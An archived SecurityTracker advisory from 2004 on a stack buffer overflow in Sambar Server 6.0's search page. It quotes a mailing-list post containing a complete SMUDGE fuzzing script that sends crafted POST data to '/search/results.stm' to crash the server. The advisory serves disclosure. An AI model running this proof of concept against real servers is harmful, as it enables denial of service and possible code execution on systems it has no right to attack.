SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Web Server/CGI)  >   Sambar Server Vendors:   Sambar Technologies
Sambar Server 'results.stm' POST Request Buffer Overflow May Permit Remote Code Execution
SecurityTracker Alert ID:  1008979
SecurityTracker URL:  http://securitytracker.com/id/1008979
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 8 2004
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 6.0
Description:   A stack overflow vulnerability was reported in the Sambar Server in the processing of HTTP POST requests. A remote user may be able to cause the web service to crash or possibly execute arbitrary code.

A remote user can reportedly send specially crafted data via a POST request to '/search/results.stm' to trigger a buffer overflow.

A demonstration exploit script using the SMUDGE tool is provided in the Source Message.

Impact:   A remote user may be able to cause the web service to crash. A remote user may be able to execute arbitrary code, however, the report indicates that arbitrary code execution is difficult to achieve.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.sambar.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:   Linux (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Feb 21 2004 (Vendor Issues Fix) Sambar Server 'results.stm' POST Request Buffer Overflow May Permit Remote Code Execution
The vendor has issued a fix.



 Source Message Contents

Date:  Fri, 6 Feb 2004 17:35:30 -0800 (PST)
Subject:  Sambar 6.0 stack overflow


Hi lists,
The following SMUDGE (http://felinemenace.org/~nd/SMUDGE) script will 
cause a (difficult to exploit) stack overflow in a default set up of the 
Sambar web server.

--- start script
# http://felinemenace.org/~nd/SMUDGE
# Sambar script (c) nd@felinemenace.org
from SMUDGE import *
import sys
sm = SMUDGE(1)

sm.setname("SambarOverflow")

sm.plain("POST /search/results.stm HTTP/1.1")
sm.addcrlf()
sm.plain("Host: MSUDGEDPU")
sm.addcrlf()
sm.plain("Content-Length: ")
sm.blocksize("postdata")
sm.addcrlf()
sm.addcrlf()
sm.putblock("postdata")
sm.addcrlf()
sm.addcrlf()

sm.newblock("postdata")
sm.updateblock("postdata","spage=0&indexname=docs&query=")
sm.blockvariable("postdata","MEEP")
sm.updateblock("postdata","&style=page")

sm.run("127.0.0.1",80,"topdown","single")
-- end script

A modification of this script will also cause misc expections in the 
BadBlue webserver ;)

- endee


-- 
http://felinemenace.org/~nd

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC